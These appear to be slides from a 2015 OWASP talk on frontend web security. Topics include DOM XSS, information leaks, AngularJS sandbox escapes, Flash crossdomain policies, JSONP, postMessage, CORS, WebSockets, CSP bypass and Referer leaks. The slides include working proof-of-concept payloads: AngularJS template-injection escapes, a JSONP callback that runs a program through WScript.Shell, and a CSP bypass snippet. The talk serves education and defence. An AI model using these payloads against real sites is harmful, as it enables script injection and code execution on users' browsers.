It’s only about frontend

Sergey Belov

Digital Security

OWASP EEE. 6th of October 2015. Poland

$ whoami

• @ Digital Security

– Penteser

– ZeroNights team

• Bug hunting (Yandex, Google, CloudFlare ...)

• Speaker – OWASP RU, BlackHat 2014, HiP 2014, ZeroNights

• Like all web related security :]

What we're talking about

Frontend security

≠ client side attacks

Example – CSRF is client side attack but depend on server side

What we're talking about

Some techniques are well known

but some are not

What we're talking about

SOP Same Origin Policy

scheme://domain:port + hardening

Cross Site Scripting

DOM

DOM XSS

document.write("Site is at: " + document.location.href);

http://victim.com/action#<script>alert('xss')</script>

DOM XSS

Sources document.URL location document.referrer window.name localStorage cookies …

DOM XSS

Sinks eval document.write (element).innerHTML (element).src setTimeout / setInterval execScript …

https://code.google.com/p/domxsswiki/

DOM XSS

Information leaks

Information leaks

Javascript examples testServer = host.match(/[^.]+\.((?:f|my\.XXX)\d*)\.YYY\.com/)

devServer = host.match(/^.+\.dev\.YYY\.com$/),

isXXX = testServer && testServer[1].indexOf('my.XXX') == 0,

...

internalDevHOST = '172.16.22.2';

internalProdHOST = '172.16.22.5';

...

var admin_url = '/secretArea/'

Information leaks

CSS examples

file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\

/assets\/stylesheets\/application\/browser-not-supported\.scss

file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\

/assets\/stylesheets\/application\/modules\/add-category\.scss

file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\

/assets\/stylesheets\/application\/modules\/alias-preview\.scss

MVC Frameworks

MVC Frameworks

MVC Frameworks

- Templates

- New elements <rockyou></rockyou>

- Bindings

MVC Frameworks

Logic-less templates

<ul>

<li ng-repeat="phone in phones">

<span>{{phone.name}}</span>

<p>{{phone.snippet}}</p>

</li>

</ul>

MVC Frameworks

Сurly braces

<ul>

<li ng-repeat="phone in phones">

<span>{{phone.name}}</span>

<p>{{phone.snippet}}</p>

</li>

</ul>

MVC Frameworks

Logic-less templates.

http://mustache.github.io/

MVC Frameworks Mustache Security • VueJS

• AngularJS

• CanJS

• Underscore.js

• KnockoutJS

• Ember.js

• Polymer

• Ractive.js

• jQuery

• JsRender

• Kendo UI

https://code.google.com/p/mustache-security/

MVC Frameworks

AngularJS (1.1.5) – access to window

<div class="ng-app">

{{constructor.constructor('alert(1)'

)()}}

</div>

MVC Frameworks

AngularJS (1.2.18) – access to window, after fix {{

(_=''.sub).call.call({}[$='constructor']

.getOwnPropertyDescriptor(_.__proto__,$)

.value,0,'alert(1)')()

}}

MVC Frameworks

Frameworks updating is important for security!

Flash

Flash

A typical example

<cross-domain-policy>

<allow-access-from domain="*" to-ports="80"/>

</cross-domain-policy>

Flash

A non-typical example

<cross-domain-policy>

... multiple domains (some unregistered)...

</cross-domain-policy>

Real bugbounty report - $$$

Flash

A non-typical example

<cross-domain-policy>

...domains from social networks (apps)...

</cross-domain-policy>

Real bugbounty report - $$$

Flash

XSS via Flash

getURL(_root.URI,'_targetFrame');

and many other cases

https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OTG-CLIENT-008)

Flash

CVE-2011-2461 IS BACK!

1) Vulnerable verson of Adobe Flex

2) Full SOP bypass

https://github.com/ikkisoft/ParrotNG/

http://blog.nibblesec.org/2015/03/the-old-is-new-again-cve-2011-2461-is.html

JSONP

JSONP

Typical case <script

src="http://vuln/getInfo?c=parseResponse">

</script>

JSONP

No sensetive data? But Content-Type is:

• text/javascript

• application/javascript

• application/x-javascript

Try ?cb=new%20ActiveXObject(“WScript.Shell”).Exec(“calc”)//

And get client side RCE (IE only / SE is required)

JSONP

http://www.youtube.com/watch?v=T0vwLsHUing

HTML5 security

HTML5 Security

otherWindow.postMessage(message, targetOrigin);

Window.postMessage()

window.addEventListener("message", receiveMessage, false);

function receiveMessage(event)

{

if (event.origin !== "http://example.org:8080")

return;

// ...

}

Domain A

Domain B

HTML5 Security

Window.postMessage()

if(message.orgin.indexOf(".example.com")!=-1)

{

/* ... */

}

Wrong!

example.com.attacker.com

HTML5 Security

otherWindow.postMessage(message, targetOrigin);

Window.postMessage()

Iframe https://accounts.google.com/b/0/ListAccounts?listPages=0&mo=1&origin=https%3A%2F%2F123123.google.com window.parent.postMessage( “... Sensetive data / user login etc...", "https:\x2F\x2F123123.google.com");

HTML5 security

HTTP access control (CORS)

1) Modern

2) Secure by default

3) Very hard to make a mistake

HTML5 security

HTTP access control (CORS)

Access-Control-Allow-Origin: *

HTML5 security

HTTP access control (CORS)

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

HTML5 security

HTTP access control (CORS)

Access-Control-Allow-Origin: *

is not compatible with

Access-Control-Allow-Credentials: true

HTML5 security

HTTP access control (CORS)

Access-Control-Allow-Origin: $origin;

HTML5 security

WebSockets

1) No authorization and/or authentication

2) WSS:// - for sensetive data

3) Validation

4) Check origin

5) …

HTML5 security

Example with websockets (Agar.IO – HTML5 game) 1) Visit Agar.IO 2) Get new server (/findServer response, some random IP) 3) Connect (ws://) to some random IP

Random IP handles only requests with valid origin (like agar.io). It can

prevent custom clients (exclude cases with full proxy on server side)

https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet

Content Security Policy

Content Security Policy

X-Content-Security-Policy:

script-src js.example.com

Content Security Policy

Content Security Policy

Last Firefox: security csp command

Content Security Policy

@cure53 challenge – CSP bypass

• CDN with AngularJS is allowed ajax.googleapis.com

ng-app"ng-csp ng-

click=$event.view.alert(1337)>

<script src=

//ajax.googleapis.com/ajax/libs/angularjs

/1.0.8/angular.js>

</script>

https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22

Extensions / SmartTV

Extensions / SmarTV

- JS/HTML/CSS

- Interaction with DOM

- XHR qureies

- Extended API

For dessert

For dessert

<a href=“http://external.com”>Go!</a>

In headers will be

Referer: http://yoursite.com/

What about images, js, css files?

For dessert

http://super-website.com/user/passRecovery?t=SECRET

...

<img src=http://comics.com/password.jpg>

...

Owner of

comics.com Can see all secret tokens

https://github.com/cure53/HTTPLeaks

Anything else?

Yes: • X-Frame-Options

• Iframe protection via JS – bypassing (iframe sandboxing / race conditions)

• Switching to HTTPS (HSTS)

• DOM Clobbering (XSS - http://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream)

• Cookies (flags, domains – IE case)

• ...?

Thanks!

Any questions?

@sergeybelove